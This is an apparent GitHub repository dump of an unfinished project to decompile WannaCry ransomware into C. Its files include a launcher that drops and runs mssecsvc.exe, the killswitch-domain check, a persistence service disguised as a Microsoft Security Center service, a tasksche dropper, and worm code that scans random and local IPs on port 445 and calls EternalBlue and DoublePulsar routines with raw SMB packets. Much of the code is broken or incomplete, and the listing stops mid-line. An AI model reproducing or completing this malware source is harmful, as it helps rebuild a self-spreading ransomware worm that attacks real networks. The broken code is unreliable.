├── README.md ├── encryptorDLL └── dllmain.cpp ├── Payload.cpp ├── functions.cpp ├── launcher.dll └── dllmain.cpp ├── Network.cpp ├── WinMain.cpp ├── Doublepulsar.cpp ├── Eternalblue.cpp └── Network.h /README.md: -------------------------------------------------------------------------------- 1 | # WannacryDecompiled 2 | 3 | Any help with this project would be great! The purpose of this project is to fully decompile Wannacry into human readable C code. 4 | -------------------------------------------------------------------------------- /encryptorDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | //help from: 4 | //https://www.youtube.com/watch?v=ru5VzUigKqw 5 | 6 | //compile and embed in main project 7 | //this file is loaded by Wannacry for the encryption portion 8 | 9 | BOOL WINAPI DllMain(HINSTANCE hModule, DWORD dwReason, LPVOID) 10 | { 11 | 12 | switch (dwReason) 13 | { 14 | case DLL_PROCESS_ATTACH: 15 | { 16 | MessageBoxA(NULL, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK); 17 | } 18 | break; 19 | case DLL_PROCESS_DETACH: 20 | { 21 | //detach 22 | } 23 | break; 24 | case DLL_THREAD_ATTACH: 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | 29 | return TRUE; 30 | } 31 | -------------------------------------------------------------------------------- /Payload.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | //EXE file global here 5 | volatile HGLOBAL hDLL_x86; 6 | volatile HGLOBAL hDLL_x64; 7 | 8 | //init the DLL payload here 9 | //read from Wannacry in IDA 10 | //also here: https://www.acronis.com/en-us/blog/posts/wannacry-attack-what-it-and-how-protect-your-computer 11 | //Memory alloc functions: https://www.tenouk.com/visualcplusmfc/visualcplusmfc20.html 12 | void initialize_payload() 13 | { 14 | /* 15 | 32-bit dll start address 0x40B020, size is 0x4060 bytes 16 | 64-bit dll start address 0x40F080, size is 0xc8a4 bytes 17 | */ 18 | DWORD NumberOfBytesRead; 19 | DWORD fileSize; 20 | //size = 0x4060 converted to decimal: 16480 21 | //Possibly -> GlobalAlloc(GPTR, 5298176) 22 | hDLL_x86 = GlobalAlloc(GMEM_ZEROINIT, 5298176); 23 | /* 0x50D000 found in IDA but most likely: 0x506000 for 32 bit */ 24 | 25 | //size = 0xc8a4 converted to decimal: 51364 26 | //Possibly -> GlobalAlloc(GPTR, 5298176) 27 | hDLL_x64 = GlobalAlloc(GMEM_ZEROINIT, 5298176); //0x50D000 found in IDA 28 | 29 | //if no errors continue 30 | if(hDLL_x86 && hDLL_x64) 31 | { 32 | //GENERIC_READ is 0x80000000 and GENERIC_WRITE is 0x40000000 33 | HANDLE fileHandle = CreateFileA(Filename, 0x80000000, 1, NULL, 3, 4, NULL); 34 | if(fileHandle != INVALID_HANDLE_VALUE) 35 | { 36 | fileSize = GetFileSize(fileHandle, NULL); 37 | *(DWORD*)hDLL_x86 + 0x4060 = fileSize; //Dword length written in x86 DLL buffer 38 | *(DWORD*)hDLL_x64 + 0xc8a4 = fileSize; //Dword length written in x64 DLL buffer 39 | ReadFile(fileHandle, hDLL_x86 + 0x4060 + sizeof(DWORD), &fileSize, &NumberOfBytesRead, 0); 40 | ReadFile(fileHandle, hDLL_x64 + 0xc8a4 + sizeof(DWORD), &fileSize, &NumberOfBytesRead, 0); 41 | CloseHandle(fileHandle); 42 | } 43 | } 44 | else 45 | { 46 | GlobalFree(hMemory_x86); 47 | GlobalFree(hMemory_x64); 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /functions.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | https://github.com/bhassani/EternalBlueC/blob/2bbf166a650b5ddab9e728794f65ebdc2d6eedcb/EternalBlue%20All%20in%20one/utils/ex_string.c 3 | */ 4 | 5 | int replace_str(char *pStrBuf, char *pOld, char *pNew); 6 | 7 | static int _str_replace(char *p_result, char* p_source, char* p_seach, char *p_repstr) 8 | { 9 | int c = 0; 10 | int repstr_leng = 0; 11 | int searchstr_leng = 0; 12 | char *p1; 13 | char *presult = p_result; 14 | char *psource = p_source; 15 | char *prep = p_repstr; 16 | char *pseach = p_seach; 17 | int nLen = 0; 18 | repstr_leng = strlen(prep); 19 | searchstr_leng = strlen(pseach); 20 | 21 | do 22 | { 23 | p1 = strstr(psource, p_seach); 24 | if (p1 == 0) 25 | { 26 | strcpy(presult, psource); 27 | return c; 28 | } 29 | c++; //匹配子串计数加1; 30 | //printf("结果:%s\r\n", p_result); 31 | //printf("源字符:%s\r\n", p_source); 32 | // 拷贝上一个替换点和下一个替换点中间的字符串 33 | nLen = p1 - psource; 34 | memcpy(presult, psource, nLen); 35 | // 拷贝需要替换的字符串 36 | memcpy(presult + nLen, p_repstr, repstr_leng); 37 | psource = p1 + searchstr_leng; 38 | presult = presult + nLen + repstr_leng; 39 | } 40 | while (p1); 41 | 42 | return c; 43 | } 44 | 45 | //used to replace the treeid and userid placeholders in the EternalBlue code found in Wannacry 46 | //Sample: replace_str(EternalBluePacket1,"__TREEID__PLACEHOLDER__", treeid_from_packet) 47 | int replace_str(char *pStrBuf, char *pOld, char *pNew) 48 | { 49 | int newLen = 0; 50 | char *pTmpBuf = NULL; 51 | 52 | newLen = strlen(pStrBuf) + 1000; 53 | pTmpBuf = (char *)malloc(newLen); 54 | if(pTmpBuf == NULL) 55 | return -1; 56 | memset(pTmpBuf, 0x00, newLen); 57 | 58 | if(_str_replace(pTmpBuf, pStrBuf, pOld, pNew) <= 0) 59 | { 60 | free(pTmpBuf); 61 | return -2; 62 | } 63 | memset(pStrBuf, 0x00, strlen(pStrBuf)); 64 | strcat(pStrBuf, pTmpBuf); 65 | free(pTmpBuf); 66 | 67 | return 0; 68 | } 69 | 70 | -------------------------------------------------------------------------------- /launcher.dll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #define _CRT_SECURE_NO_WARNINGS 3 | 4 | #include 5 | #include 6 | 7 | //assistance from: 8 | //https://blog.kartone.ninja/2019/05/23/malware-analysis-a-wannacry-sample-found-in-the-wild/ 9 | //https://www.programmersought.com/article/5646318912/ 10 | //https://www.ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources 11 | //https://cboard.cprogramming.com/windows-programming/117578-hmodule-current-dll.html 12 | //https://stackoverflow.com/questions/13408306/including-a-text-file-as-a-local-resource-in-an-exe 13 | //https://docs.microsoft.com/en-us/windows/win32/procthread/creating-processes 14 | 15 | extern "C" VOID __declspec(dllexport) PlayGame(); 16 | int ExtractAndCreate(); 17 | int RunProcess(); 18 | 19 | //global 20 | char szDest[MAX_PATH]; 21 | HMODULE hInstDLL; 22 | 23 | extern "C" VOID __declspec(dllexport) PlayGame() 24 | { 25 | sprintf(szDest, "C:\\%s\\%s", "WINDOWS", "mssecsvc.exe"); 26 | ExtractAndCreate(); 27 | RunProcess(); 28 | } 29 | 30 | int ExtractAndCreate() 31 | { 32 | HRSRC hSrc; 33 | HANDLE hFile; 34 | DWORD NumberOfBytesToWrite = 0; 35 | DWORD ResourceSize; 36 | HGLOBAL hResourceData; 37 | PVOID pRsrc; 38 | hSrc = FindResourceA(hInstDLL, (LPCSTR)101, "W"); 39 | hResourceData = LoadResource(hInstDLL, hSrc); 40 | pRsrc = LockResource(hResourceData); 41 | ResourceSize = SizeofResource(hInstDLL, hSrc); 42 | 43 | //dwFlagsAndTrributes = 4 44 | //find out whatever 0x40000000 is 45 | //UPDATE: GENERIC_WRITE is 0x40000000 46 | hFile = CreateFileA(szDest, 0x40000000, 2, 0, 2, 4, 0); 47 | if (!hFile) 48 | { 49 | //+4 to skip the DWORD length that's written before the actual resource 50 | WriteFile(hFile, (PVOID*)pRsrc + 4, ResourceSize, &NumberOfBytesToWrite, NULL); 51 | CloseHandle(hFile); 52 | } 53 | return 0; 54 | } 55 | 56 | int RunProcess() 57 | { 58 | PROCESS_INFORMATION ProcessInformation; 59 | STARTUPINFOA StartupInfo; 60 | /* 61 | ProcessInformation.hProcess = 0; 62 | ProcessInformation.hThread = 0; 63 | ProcessInformation.dwProcessId = 0; 64 | */ 65 | //memset(&StartupInfo.lpReserved, 0, sizeof(StartupInfo)); 66 | /* 67 | StartupInfo.cb = 104; 68 | StartupInfo.wShowWindow = 0; 69 | StartupInfo.dwFlags = 129; 70 | */ 71 | ZeroMemory(&StartupInfo, sizeof(StartupInfo)); 72 | StartupInfo.cb = sizeof(StartupInfo); 73 | //ZeroMemory(&StartupInfo, sizeof(StartupInfo)); 74 | // StartupInfo.cb = sizeof(StartupInfo); 75 | //ZeroMemory(&ProcessInformation, sizeof(ProcessInformation)); 76 | if(CreateProcess(NULL, (LPWSTR)szDest, NULL, NULL, FALSE, 0, NULL, NULL, (LPSTARTUPINFOW)&StartupInfo, &ProcessInformation)) 77 | { 78 | CloseHandle(ProcessInformation.hThread); 79 | CloseHandle(ProcessInformation.hProcess); 80 | } 81 | return 0; 82 | } 83 | 84 | BOOL APIENTRY DllMain( HMODULE hModule, 85 | DWORD ul_reason_for_call, 86 | LPVOID lpReserved 87 | ) 88 | { 89 | hInstDLL = hModule; 90 | switch (ul_reason_for_call) 91 | { 92 | case DLL_PROCESS_ATTACH: 93 | //for testing purposes; remove in final version 94 | MessageBoxA(NULL, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK); 95 | case DLL_THREAD_ATTACH: 96 | case DLL_THREAD_DETACH: 97 | //for testing purposes; remove in final version 98 | MessageBoxA(NULL, "DLL_PROCESS_DETACH", "DLL_PROCESS_DETACH", MB_OK); 99 | case DLL_PROCESS_DETACH: 100 | break; 101 | } 102 | return TRUE; 103 | } 104 | -------------------------------------------------------------------------------- /Network.cpp: -------------------------------------------------------------------------------- 1 | //https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/ 2 | //skeleton code at this moment 3 | //still a work in progress 4 | 5 | //https://stackoverflow.com/questions/37838490/how-to-properly-set-a-flag-in-the-write-fds-and-select-in-c 6 | int canConnectToPort445(char *ip) 7 | { 8 | struct sockaddr name; 9 | struct timeval timeout; 10 | fd_set writefds; 11 | SOCKET control_sock; 12 | u_long argp; 13 | int result; 14 | 15 | FD_ZERO(&writefds); 16 | 17 | name.sin_family = AF_INET; 18 | name.sin_addr.s_addr = inet_addr(ip); 19 | name.sin_port = htons(445); 20 | 21 | control_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 22 | if(control_sock == -1) 23 | { 24 | result = 0; 25 | } else { 26 | ioctlsocket(control_sock, FIONBIO, &argp); 27 | writefds.fd_array[0] = control_sock; 28 | writefds.fd_count = 1; 29 | timeout.tv_sec = 1; 30 | timeout.tv_usec = 0; 31 | connect(control_sock, (struct sockaddr*)&name, sizeof(name)); 32 | int ret = select(0, 0, &writefds, 0, &timeout); 33 | closesocket(control_sock); 34 | result = ret; 35 | } 36 | return result; 37 | } 38 | 39 | DWORD MS17_010(DWORD LPPARAM) 40 | { 41 | lpparam = (struct in_addr) ; 42 | int attemptCount; 43 | //CheckMS17Vulnerability here; continue if vulnerable 44 | if ( CheckForEternalBlue(&target, 445)) 45 | { 46 | attemptCount = 0; 47 | do 48 | { 49 | Sleep(3000); 50 | if ( IsDOUBLEPULSARInstalled(&target, 1, 445) ) 51 | break; 52 | Sleep(3000); 53 | //EternalBlue pwn here 54 | EternalBluePwn(&target, 445); 55 | ++attemptCount; 56 | } while ( attemptCount < 5 ); 57 | } 58 | Sleep(3000); 59 | if ( IsDOUBLEPULSARInstalled(&target, 1, 445)) 60 | { 61 | runPayloadOnTarget(&target, 1, 445); 62 | } 63 | endthreadex(0); 64 | return 0; 65 | } 66 | 67 | int scanIP(void *arg) 68 | { 69 | char *target = (char*)arg; 70 | HANDLE ExploitHandle; 71 | if (canConnectToPort445(target) > 0) 72 | { 73 | ExploitHandle = (HANDLE)_beginthreadex(NULL, MS17_010, target, 0, 0); 74 | //Not sure if the if statement is needed but we'll keep it here for now 75 | if( ExploitHandle ) 76 | { 77 | if (WaitForSingleObject(ExploitHandle, 60000) == 258 )) 78 | { 79 | TerminateThread(ExploitHandle, 0); 80 | CloseHandle(ExploitHandle); 81 | } 82 | } 83 | } 84 | endthreadex(0); 85 | return 0; 86 | } 87 | 88 | int __stdcall LANThreadFunc(void *param) 89 | { 90 | //Obtain local IP address 91 | 92 | 93 | //Generate other IP addresses 94 | char local_generated_ip; 95 | 96 | HANDLE ScanIPHandle; 97 | ScanIPHandle = (HANDLE)_beginthreadex(0, 0, scanIP, local_generated_ip, 0, 0); 98 | 99 | if( ScanIPHandle ) 100 | { 101 | if (WaitForSingleObject(ScanIPHandle, 60000) == 258 )) 102 | { 103 | TerminateThread(ScanIPHandle, 0); 104 | CloseHandle(ScanIPHandle); 105 | } 106 | } 107 | 108 | int __stdcall WANThreadFunc(void *param) 109 | { 110 | srand(GetTickCount()); 111 | //Generate IP address 112 | char *generated_ip[16]; 113 | sprintf(generated_ip, "%d.%d.%d.%d", rand() % 254, rand() % 254, rand() % 254, rand() % 254 ); 114 | 115 | HANDLE ScanIPHandle; 116 | ScanIPHandle = (HANDLE)_beginthreadex(0, 0, scanIP, generated_ip, 0, 0); 117 | 118 | if( ScanIPHandle ) 119 | { 120 | if (WaitForSingleObject(ExploitHandle, 60000) == 258 )) 121 | { 122 | TerminateThread(ExploitHandle, 0); 123 | CloseHandle(ExploitHandle); 124 | 125 | } 126 | } 127 | 128 | /* 129 | Threading: https://www.bogotobogo.com/cplusplus/multithreaded2A.php 130 | http://simplesamples.info/windows/_beginthreadex.aspx 131 | https://jeffpar.github.io/kbarchive/kb/132/Q132078/ 132 | https://www.programmersought.com/article/57053139965/ 133 | https://sodocumentation.net/winapi/topic/1756/process-and-thread-management 134 | */ 135 | int threadScanMain() 136 | { 137 | HANDLE LanThread; 138 | LanThread = (HANDLE)_beginthreadex(NULL, NULL, LANThreadFunc, 0, 0, 0); 139 | 140 | int thread_count = 0; 141 | DWORD dwThreadIdArray[128]; 142 | HANDLE hThreadArray[128]; 143 | do 144 | { 145 | hThreadArray[i] = CreateThread(NULL, 0, WANThreadFunc, NULL, 0, &dwThreadIdArray[i]); 146 | thread_count++; 147 | Sleep(2000); 148 | } 149 | }while(thread_count <= 128); 150 | } 151 | -------------------------------------------------------------------------------- /WinMain.cpp: -------------------------------------------------------------------------------- 1 | //https://medium.com/@yogeshojha/reverse-engineering-wannacry-ransomware-using-ghidra-finding-the-killswitch-a212807e9354 2 | //https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/ 3 | 4 | //Video: https://www.youtube.com/watch?v=Sv8yu12y5zM 5 | //Video: https://www.youtube.com/watch?v=Q90uZS3taG0 6 | //Video: https://www.youtube.com/watch?v=ru5VzUigKqw 7 | //Help from: 8 | //https://tech-zealots.com/threat-lab/dissecting-wannacry-ransomware-to-its-core-technical-analysis/ 9 | //https://www.youtube.com/watch?v=Sv8yu12y5zM 10 | //https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/ 11 | //https://blogs.windows.com/russia/2017/05/17/windows-vs-wannacrypt/ 12 | 13 | /* massive IDA screenshots & help from article: 14 | https://www.programmersought.com/article/23574059266/ 15 | */ 16 | 17 | 18 | #include 19 | #include 20 | #include 21 | #pragma comment(lib, "wininet.lib") 22 | 23 | //globals 24 | char executable_path[MAX_PATH]; //Get executable path 25 | 26 | //obtain the network card configuration and IP address details 27 | int AdapterInfo() 28 | { 29 | GetAdaptersInfo(); 30 | } 31 | 32 | //not finished 33 | int LAN_Spread() 34 | { 35 | LOBYTE(); 36 | AdapterInfo(); 37 | } 38 | 39 | //not finished 40 | void InitCryptoContext() 41 | { 42 | CryptAcquireContextA(Unknown, NULL, UNK, UNK, &0xf0000000); 43 | InitializeCriticalSection(LPCRITICAL_SECTION, &UNKNOWN); 44 | } 45 | 46 | int initializeSockets() 47 | { 48 | WSADATA WSAData; 49 | if(WSAStartup(MAKEWORD(2,2), &WSAData)) 50 | { 51 | return 0; 52 | } 53 | InitCryptoContext(); //CryptAcquireContext 54 | initialize_payload(); 55 | } 56 | 57 | int InitOperations() 58 | { 59 | int result; 60 | int threadCount; 61 | result = initializeSockets(); 62 | if(result) 63 | { 64 | hLanSpread = beginthreadex(0, 0, LAN_Spread, 0, 0, 0); 65 | if(hLanSpread) 66 | { 67 | CloseHandle(hLanSpread); 68 | } 69 | threadCount = 0; 70 | do 71 | { 72 | hWANSpread = beginthreadex(0, 0, WAN_Spread, threadCount, 0, 0); 73 | if(hWANSpread) 74 | { 75 | CloseHandle(hWANSpread); 76 | } 77 | Sleep(2000); 78 | hWANSpread++; 79 | } while (threadCount < 128); 80 | result = 0; 81 | } 82 | return result; 83 | } 84 | 85 | int create_service() 86 | { 87 | SC_HANDLE hSCManager; 88 | SC_HANDLE hService; 89 | char exec_with_args[260]; 90 | 91 | sprintf(exec_with_args, "%s -m security", executable_path); 92 | hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS); 93 | if(hSCManager != NULL) 94 | { 95 | //Fix this 96 | hService = CreateServiceA(hSCManager, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 16, 2, 1, &exec_with_args, NULL, NULL, NULL, NULL, NULL); 97 | if(hService != NULL) 98 | { 99 | StartServiceA(hService, 0, NULL); 100 | CloseServiceHandle(hService); 101 | } 102 | CloseServiceHandle(hSCManager); 103 | return 0; 104 | } 105 | return 0; 106 | } 107 | 108 | //not finished 109 | int drop_tasksche() 110 | { 111 | HANDLE hModule = GetModuleHandleW("kernel32.dll"); 112 | HANDLE hFile; 113 | 114 | //fix these function definitions 115 | /* 116 | GetProcAddress(hModule, "CreateProcessA"); 117 | GetProcAddress(hModule, "CreateFileA"); 118 | GetProcAddress(hModule, "WriteFile"); 119 | GetProcAddress(hModule, "CloseHandle"); 120 | 121 | typedef BOOL (WINAPI *_CLOSEHANDLE)(HANDLE hObject); 122 | typedef HANDLE (WINAPI *_CREATEFILEW)(LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 123 | 124 | fCloseHandle = (_CLOSEHANDLE)GetProcAddress(hModule, CLOSEHANDLE, 0); 125 | fCreateFile = (_CREATEFILEW)GetProcAddress(hModule, CREATEFILEW, 0); 126 | 127 | */ 128 | //copied from: https://github.com/gbmaster/loadLibrary/blob/master/kernel32.cpp 129 | 130 | PROCESS_INFORMATION pi; 131 | STARTUPINFOA si; 132 | DWORD nNumberOfBytesWritten; 133 | 134 | HRSRC hResInfo = FindResourceA(0, 1831, "UNK"); 135 | HGLOBAL hResData = LoadResource(0, hResInfo); 136 | PVOID lpBuffer = LockResource(hResData); 137 | DWORD nNumberOfBytesToWrite = SizeofResource(0, hResInfo); 138 | char szFileName[] = "tasksche.exe"; 139 | char szPath[MAX_PATH]; 140 | char szNewPath[MAX_PATH]; 141 | sprintf(szPath, "C:\\%s\\%s", "WINDOWS", szFileName); 142 | sprintf(szPath, "C:\\%s\\qeriuwjhrf", "WINDOWS"); 143 | //MoveFileExA(szPath, szNewPath, REPLACE_EXISTING); 144 | MoveFileExA(szPath, szNewPath, 1); 145 | //GENERIC_WRITE is 0x40000000 146 | //CreateFileA(szPath, GENERIC_WRITE, NULL, NULL, CREATE_ALWAYS, SYSTEM, NULL); 147 | hFile = CreateFileA(szPath, 0x40000000, 0, 0, 2, 4, 0); 148 | if(hFile != INVALID_HANDLE_VALUE) 149 | { 150 | WriteFile(hFile, lpBuffer, nNumberOfBytesToWrite, &nNumberOfBytesWritten, 0); 151 | CloseHandle(hFile); 152 | } 153 | //add the /i parameter to the end of tasksche 154 | strcat(szPath, " /i"); 155 | //run tasksche with /i parameters 156 | if(CreateProcessA(NULL, szPath, 0, 0, 0, 0x8000000, 0, 0, &pi, &si)) 157 | { 158 | CloseHandle(hFile); 159 | CloseHandle(hModule); 160 | } 161 | } 162 | 163 | int no_argument_handler() 164 | { 165 | create_service(); 166 | drop_tasksche(); 167 | } 168 | 169 | //Not finished yet, must be fixed for this to work 170 | SERVICE_STATUS_HANDLE ServiceMain() 171 | { 172 | SERVICE_STATUS_HANDLE result; 173 | 174 | ServiceStatus.dwServiceType = 32; 175 | ServiceStatus.dwCurrentState = 2; 176 | ServiceStatus.dwControlsaccepted = 1; 177 | ServiceStatus.dwWin32ExitCode = 0; 178 | ServiceStatus.dwServiceSpecificExitCode = 0; 179 | ServiceStatus.dwCheckPoint = 0; 180 | ServiceStatus.dwWaitHint = 0; 181 | 182 | result = RegisterServiceCtrlHandlerA(ServiceName, HandlerProc); 183 | if(result) 184 | { 185 | ServiceStatus.dwCurrentState = 4; 186 | ServiceStatus.dwCheckPoint = 4; 187 | Servicestatus.dwWaitHint = 0; 188 | SetServicestatus(result, &ServiceStatus); 189 | InitOperations(); 190 | Sleep(86400000); 191 | ExitProcess(1); 192 | } 193 | return result; 194 | } 195 | 196 | //https://github.com/jnwilson/MalwareExercises/blob/0994222f90bd7de305ff8115dec053065f8d013f/Chapter%207/ex1.c 197 | //https://github.com/StefanoBelli/lol/blob/92fd0e349ac42eb71ae9a1302559567cca64c0a1/Win32/ServiceLauncher.c 198 | //https://github.com/sagishahar/scripts/blob/master/windows_service.c 199 | //IDA screenshots: https://www.programmersought.com/article/23574059266/ 200 | int RealMain() 201 | { 202 | SC_HANDLE hSCManager; 203 | SC_HANDLE SCObject; 204 | SERVICE_TABLE_ENTRYA ServiceStartTable; 205 | int *argc; 206 | char szName[] = "MSSecSvc"; 207 | GetModuleFileName(NULL, &executable_path, sizeof(executable_path)); 208 | 209 | argc = (int*)__p__argc(); 210 | if(*argc < 2) 211 | { 212 | no_argument_handler(); 213 | } 214 | 215 | /* https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights */ 216 | hSCManager = OpenSCManager(0, 0, SC_MANAGER_ALL_ACCESS); 217 | 218 | if(!hSCManager) 219 | { 220 | hSCObject = OpenServiceA(hSCManager, szName, SERVICE_START); 221 | if(!hSCObject) 222 | { 223 | //sub_407FA0 hSCObject, 0x3c); 224 | CloseServiceHandle(hSCObject); 225 | } 226 | CloseServicehandle(hSCManager); 227 | } 228 | 229 | ServiceStartTable.lpServiceName = "MSSecSvc 2.0"; 230 | ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTION) ServiceMain; 231 | 232 | return StartServiceCtrlDispatcher(&ServiceStartTable); 233 | 234 | //CloseServiceHandle(hSCManager); 235 | //CloseServiceHandle(SCObject); 236 | } 237 | 238 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow) 239 | { 240 | char szUrl[] = "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"; 241 | HINTERNET hInternet; 242 | HINTERNET hUrl; 243 | hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 244 | hUrl = InternetOpenUrl(hInternet, szUrl, NULL, 0, INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, NULL); 245 | if (hUrl) 246 | { 247 | InternetCloseHandle(hUrl); 248 | InternetCloseHandle(hInternet); 249 | return 0; 250 | } 251 | else { 252 | InternetCloseHandle(hUrl); 253 | InternetCloseHandle(hInternet); 254 | RealMain(); 255 | } 256 | return 0; 257 | } 258 | -------------------------------------------------------------------------------- /Doublepulsar.cpp: -------------------------------------------------------------------------------- 1 | //To determine if DoublePulsar is present 2 | unsigned char SmbNegociate[] = 3 | "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00" 4 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 5 | "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54" 6 | "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"; 7 | 8 | unsigned char Session_Setup_AndX_Request[] = 9 | "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00" 10 | "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 11 | "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff" 12 | "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 13 | "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d" 14 | "\x62\x00"; 15 | 16 | unsigned char treeConnectRequest[] = 17 | "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00" 18 | "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 19 | "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08" 20 | "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00" 21 | "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00" 22 | "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f" 23 | "\x3f\x00"; 24 | 25 | unsigned char trans2_session_setup[] = 26 | "\x00\x00\x00\x4E\xFF\x53\x4D\x42\x32\x00\x00\x00\x00\x18\x07\xC0" 27 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE" 28 | "\x00\x08\x41\x00\x0F\x0C\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00" 29 | "\x00\xA6\xD9\xA4\x00\x00\x00\x0C\x00\x42\x00\x00\x00\x4E\x00\x01" 30 | "\x00\x0E\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 31 | "\x00\x00" 32 | 33 | unsigned int LE2INT(unsigned char *data) 34 | { 35 | unsigned int b; 36 | b = data[3]; 37 | b <<= 8; 38 | b += data[2]; 39 | b <<= 8; 40 | b += data[1]; 41 | b <<= 8; 42 | b += data[0]; 43 | return b; 44 | } 45 | 46 | unsigned int ComputerDOUBLEPULSARXorKey(unsigned int key) 47 | { 48 | return 2 * key ^ ((((key >> 16) | key & 0xFF0000) >> 8) | (((key << 16) | key & 0xFF00) << 8)); 49 | } 50 | 51 | int xor_payload(int xor_key, int buf, int size) 52 | { 53 | int i; 54 | char __xor_key[5]; 55 | i = 0; 56 | *&__xor_key[1] = 0; 57 | *__xor_key = xor_key; 58 | if (size <= 0) 59 | return 0; 60 | do 61 | { 62 | *(i + buf) ^= __xor_key[i % 4]; 63 | ++i; 64 | } while ( i < size ); 65 | return 0; 66 | } 67 | 68 | int IsDOUBLEPULSARInstalled(char *host, int flagUninstall, u_short hostshort) 69 | { 70 | SOCKET dsock; 71 | struct sockaddr name; 72 | char userid[2]; 73 | char treeid[2]; 74 | char recvbuff[1024]; 75 | 76 | name.sin_family = AF_INET; 77 | name.sin_addr.s_addr = inet_addr(host); 78 | name.sin_port = htons(hostshort); 79 | dsock = socket(AF_INET, SOCK_STREAM, 0); 80 | connect(dsock, (struct sockaddr*) &name, sizeof(name)); 81 | 82 | //send SMB negociate packet 83 | send(dsock, (char*)SmbNegociate, sizeof(SmbNegociate) - 1, 0); 84 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 85 | 86 | //send Session Setup AndX request 87 | send(dsock, (char*)Session_Setup_AndX_Request, sizeof(Session_Setup_AndX_Request) - 1, 0); 88 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 89 | 90 | //copy userID from recvbuff @ 32,33 91 | userid[0] = recvbuff[32]; 92 | userid[1] = recvbuff[33]; 93 | 94 | //update userID in the tree connect request 95 | treeConnectRequest[32] = userid[0]; 96 | treeConnectRequest[33] = userid[1]; 97 | send(dsock, (char*)treeConnectRequest, sizeof(treeConnectRequest) - 1, 0); 98 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 99 | 100 | //copy treeID from recvbuff @ 28, 29 101 | treeid[0] = recvbuff[28]; 102 | treeid[1] = recvbuff[29]; 103 | 104 | trans2_session_setup[28] = treeid[0]; 105 | trans2_session_setup[29] = treeid[1] 106 | trans2_session_setup[32] = userid[0]; 107 | trans2_session_setup[33] = userid[1]; 108 | 109 | send(dsock, (char*)trans2_session_setup, sizeof(trans2_session_setup) - 1, 0); 110 | recv(dsock, (char*)recvbuff, sizeof(recvbuff), 0); 111 | 112 | if (recvbuff[34] == 0x51) 113 | { 114 | if ( flagUninstall ) 115 | { 116 | WORD burn1, burn2, burn3, burn4, burn5; 117 | 118 | burn1 = 66; //update multiplex ID to x42 119 | burn2 = 14; //burn command - trans2_session_setup[49] = "\x0e" 120 | burn3 = 105; //burn command - trans2_session_setup[50] = "\x69" 121 | burn4 = 0; //burn command - trans2_session_setup[51] = "\x00" 122 | burn5 = 0; //burn command - trans2_session_setup[52] = "\x00" 123 | 124 | //modify our trans2 session packet to include the burn command 125 | memcpy(trans2_session_setup + 0x22, (char*)&burn1, 1); 126 | memcpy(trans2_session_setup + 0x31, (char*)&burn2, 1); 127 | memcpy(trans2_session_setup + 0x32, (char*)&burn3, 1); 128 | memcpy(trans2_session_setup + 0x33, (char*)&burn4, 1); 129 | memcpy(trans2_session_setup + 0x34, (char*)&burn5, 1); 130 | send(dsock, (char*)trans2_session_setup, sizeof(trans2_session_setup) - 1, 0); 131 | recv(dsock, (char*)uninstall_response, 1024, 0); 132 | closesocket(dsock); 133 | return 1; 134 | } 135 | closesocket(dsock); 136 | } 137 | return 0; 138 | } 139 | 140 | int 